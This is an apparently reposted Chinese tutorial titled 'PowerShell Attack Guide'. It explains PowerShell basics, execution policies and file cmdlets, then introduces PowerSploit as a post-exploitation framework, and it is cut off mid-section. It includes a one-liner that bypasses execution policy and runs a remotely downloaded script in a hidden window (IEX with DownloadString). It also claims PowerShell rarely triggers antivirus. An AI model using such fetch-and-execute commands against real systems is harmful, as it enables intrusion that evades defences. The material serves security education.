1. <dd id="erndk"></dd>
                1. PowerShell攻擊指南

                  互聯網 2021/8/15 7:06:13

                  PowerShell攻擊指南 PowerShell 1、介紹 powershell需要.NET環境的支持,同時支持.NET對象,其可讀性易用性居所有shell之首。腳本可以在內存中執行,不需要寫入磁盤。 幾乎不會觸發殺毒軟件 可以遠程執行 目前很多工具都是基于powershell開發的 使很多windows腳本的執行變…

                  PowerShell攻擊指南

                  PowerShell

                  1、介紹

                  powershell需要.NET環境的支持,同時支持.NET對象,其可讀性易用性居所有shell之首。

                  1. 腳本可以在內存中執行,不需要寫入磁盤。
                  2. 幾乎不會觸發殺毒軟件
                  3. 可以遠程執行
                  4. 目前很多工具都是基于powershell開發的
                  5. 使很多windows腳本的執行變得更容易
                  6. cmd.exe的運行通常會被阻止,但是power shell的運行通常不會被阻止
                  7. 可用于管理活動目錄

                  輸入Get-Host 或者 $PSVersionTable.PSVERSION 查看powershell的版本

                  PS C:\Users\DELL> Get-Host
                  
                  
                  Name             : ConsoleHost
                  Version          : 5.1.18362.1171
                  InstanceId       : a9795f0c-814a-4e0e-95ea-b29b3a2fbbfc
                  UI               : System.Management.Automation.Internal.Host.InternalHostUserInterface
                  CurrentCulture   : zh-CN
                  CurrentUICulture : zh-CN
                  PrivateData      : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
                  DebuggerEnabled  : True
                  IsRunspacePushed : False
                  Runspace         : System.Management.Automation.Runspaces.LocalRunspace
                  
                  PS C:\Users\DELL> $PSVersionTable.PSVERSION
                  
                  Major  Minor  Build  Revision
                  -----  -----  -----  --------
                  5      1      18362  1171
                  
                  

                  2、基本概念

                  1、.ps1文件

                  一個powershell腳本其實是一個簡單的文本文件,其擴展名為 .ps1 。每個腳本文件包含一系列的powershell命令,每個命令顯示為獨立的一行。

                  2、執行策略

                  為了防止使用者運行惡意腳本,powershell提供了一個執行策略。在默認情況下,這個 策略被設置為不能運行。如果腳本不能運行可以執行下面的命令查詢當前的執行策略

                  Get-ExwcutionPolicy

                  Restrcted 腳本不能運行(默認設置)

                  RemoteSigned 在本地創建的腳本可以運行,但從網上下載的腳本不能運行(擁有數字證書的簽名的除外)

                  AllSigned 僅當腳本由受信任的發布者簽名時才能運行

                  Unrestricted 允許所有腳本運行

                  可用下面的cmdlet命令設置powershell的執行策略

                  Set-ExecutionPolicy <policy name>
                  

                  3、運行腳本

                  必須輸入完整的路徑和文件名

                  4、管道

                  將一個命令的輸出作為另一個命令的輸入

                  get-process p* | stop-process
                  

                  3、常用命令

                  新建目錄

                  New-Item test -type Directory
                  

                  新建文件

                  New-Item test.txt -type File
                  

                  刪除目錄或文件

                  Remove-Item test
                  

                  顯示文本內容

                  get-content test.txt
                  

                  設置文本內容

                  set-content 1.txt -value "hell,word!"
                  

                  追加內容

                  Add-Content 1.txt -Value "i love you"
                  

                  清除內容

                  Clear-Content test.txt
                  

                  上傳test.psl至目標服務器,在CMD環境下,在目標服務器本地執行該腳本。

                  powerShell.exe -Executionpolicy Bypass -File test.psl
                  

                  從遠程服務器下載腳本,繞過本地權限并隱藏執行

                  powerShell.exe -Executionpolicy Bypass-WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.webClient).DownloadString("test.psl");[Parameters]
                  

                  powersploit

                  1、概念及其調用

                  一款基于powershell的后滲透框架軟件,包含很多power shell攻擊腳本。主要用于信息偵察、權限維持、權限提升

                  Kali Linux 系統內置了 Powersploit,安裝在 /usr/share/windows-resources/powersploit 目錄下,可以通過 ls 命令看到各種腳本類型

                  ┌──(root
                  
                  	
                  隨時隨地學軟件編程-關注百度小程序和微信小程序
                  關于找一找教程網

                  本站文章僅代表作者觀點,不代表本站立場,所有文章非營利性免費分享。
                  本站提供了軟件編程、網站開發技術、服務器運維、人工智能等等IT技術文章,希望廣大程序員努力學習,讓我們用科技改變世界。
                  [PowerShell攻擊指南]http://www.yachtsalesaustralia.com/tech/detail-216696.html

                  贊(0)
                  關注微信小程序
                  程序員編程王-隨時隨地學編程

                  掃描二維碼或查找【程序員編程王】

                  可以隨時隨地學編程啦!

                  技術文章導航 更多>
                  国产在线拍揄自揄视频菠萝

                        1. <dd id="erndk"></dd>